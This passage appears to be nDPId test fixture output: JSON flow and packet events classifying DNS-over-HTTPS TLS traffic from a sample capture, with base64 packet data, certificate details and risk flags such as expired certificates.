0zGs5xxH5dXSgC84hPug8TuHm5XeS02QK5ivwcMFrRGIBts0M6ytr6tm6t5af5Z2U58e0QlvyTSXCPiJUK3gUQUYViS\/IjXLR2ycg4306mXwXdbQ8v7MG8Jbo+42mtOwsAND+01bl1fOhl5IjO\/hKWjGNBJndlQaRfYzoY1bNcjrUVpsWniWOjJBYJ9yapHVp6DQ0QxTAp4enh41yjjXkuC9cO0IfBYAr0q3doev3F6MDmfD3QC30o0nnTuJKglBmQmNqmFF98Ioa6LYtVQSVj9fT7Jq0Jj7\/w6McuInFQUSdd3NIs7zDF4f1McMigXXd3svv1byyFwMDARmEZ3FvSkJXAws42ybGrYb\/Ga9WUTit+emudCQdO3qxSLRL9Xz90Zj\/0AIfatwlfnnVgLFc5QxTIdMvpyCnIjSAcDaEJvu6yM03S3K45PurYyNI6VNrD8T3C7JZ2oGRKr9xNDuiMdmtC9\/9YGpIp8JcXSnnpIql+dalqpwG9n50trcQI0C4J+hm1Yu6USN4wzVC+tr3gsW6PyyDAAs17vVbo+Scs5p00FZ1o\/rHfMtLfFwh8MAYWoGvtptGh9N2zS+PrJ1tBcSPIWnstLtsnAnrYxfC9FGgvCH\/DigiWfhGZwyoa504FzWxS6CzOvDPhsC522yXw\/\/MDJuJbpdH1g+oBnB701N1aymW+zBchXMoA1YOfcUScPREsxcDAwBF82UTEIbXenVn7eF73krbJp8pjxkB3FH+h3306Rr5JIHM3AbirkPdWnHupm94YxIhIDqYUbC9YcWD3w0dLlmwNJiAVT\/+"} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":552,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739661512,"flow_last_seen":946739661535,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739661535,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":946739661537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739661537,"pkt":"REREREREZmZmZmZmCABFAAB4x6RAAK8GODIKAAABuetRAa6gAbuz5lpElG1MBVAYAfXMEwAAFAMDAAEBFwMDAEU4SkGRhTVOzjkja1xO2w+N\/vz+OkRmcdhLqaqpXQNb6A6SRcM4Xi9F7CyJ7zWjY541e0wZEZOfbwCMOI4VGHKGlHVB\/Ow="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":946739879619,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739879619,"pkt":"REREREREZmZmZmZmCABFAAFIcKVAAGQGIToKAAAB0frxGYueAbsFpAMoj2Q4kFAYAfaFCwAAFgMBARsBAAEXAwNRmx2nSkx+6m6KcnM1jGr2d9+E6hEUWeU+Rct80JF14yBFUW7fbN2m28L3JLX9K8uSgoBCeEP2oBBIn6aFnchRZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILzmWxHpwarRt4Ej829OBgtUnpC5uzX3e58yGu+riJtB"} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739879619,"flow_last_seen":946739879619,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739879619,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03223{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739879647,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAgoIhBAADcGle\/R+vEZCgAAAQG7i56PZDiQBaQESFAYAfWL6wAAFgMDAGYCAABiAwOvuIoBv9aLdY9+pRuVYLTvaIEBB5j8JJqoUP\/T+o4DJyAaq0H4FgIYS60khmCU6D9TGVas7XFToGUgExNzFU9aPcAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":565,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":946739879647,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739879647,"pkt":"ZmZmZmZmRERERERECABFAAXxIhJAADcGmCTR+vEZCgAAAQG7i56PZECQBaQESFAYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIKQoxhH\/Z4NdCHDs7qK8wmGbCtHgbBpAtyYYPJoz0BNpCAQBAI2s5yjtMrI9QJNozqSEdCsumaSKt\/QNxoJ5PFMWs10MAWl+5CjGLSlpjhytuQkP602gJ28TSQHyyO39DQ2pHRZ1MjKiwLUGQnSrx7B1qsIRx8U65WEhaQ\/Oefjv8VGGg2Nnh0hcGrHjYUxlGavnUge+GnGDrvgzWTdBb6fu\/ASgdFWYo\/L\/cx\/DQSF7KqdfFLYtqS\/mVGjCi+aU3DGzfokfH8gTddjOpZA9DbKNE5R+fiOUj+uHJsETXL1+AHkZ1DyEVNTPTtlzClPqiVFZoiQLHaM5Rks\/r\/SATzjVrNW7MyikygwLvRY4rKK4uz5N88k\/vqkRvVB4EA04vef95bIWAwMABA4AAAA="} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":566,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739879619,"flow_last_seen":946739879647,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739879647,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739400702,"flow_last_seen":946739407673,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":5567,"flow_avg_l4_payload_len":309,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":946739312203,"flow_last_seen":946739327905,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":5116,"flow_avg_l4_payload_len":232,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":946739879619,"flow_last_seen":946739888204,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":4885,"flow_avg_l4_payload_len":348,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35742,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":946739389936,"flow_last_seen":946739420902,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":6677,"flow_avg_l4_payload_len":333,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739390933,"flow_last_seen":946739421078,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":5324,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739311566,"flow_last_seen":946739327918,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6429,"flow_avg_l4_payload_len":378,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55322,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739336955,"flow_last_seen":946739364937,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5781,"flow_avg_l4_payload_len":385,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":946739378577,"flow_last_seen":946739410674,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2503,"flow_tot_l4_payload_len":5076,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":946739305650,"flow_last_seen":946739328075,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2194,"flow_tot_l4_payload_len":5876,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739304846,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":6025,"flow_avg_l4_payload_len":354,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":946739310980,"flow_last_seen":946739321153,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":5652,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946739317842,"flow_last_seen":946739327879,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":5992,"flow_avg_l4_payload_len":399,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":577,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":946739402059,"flow_last_seen":946739432187,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":6475,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":946739888204,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} 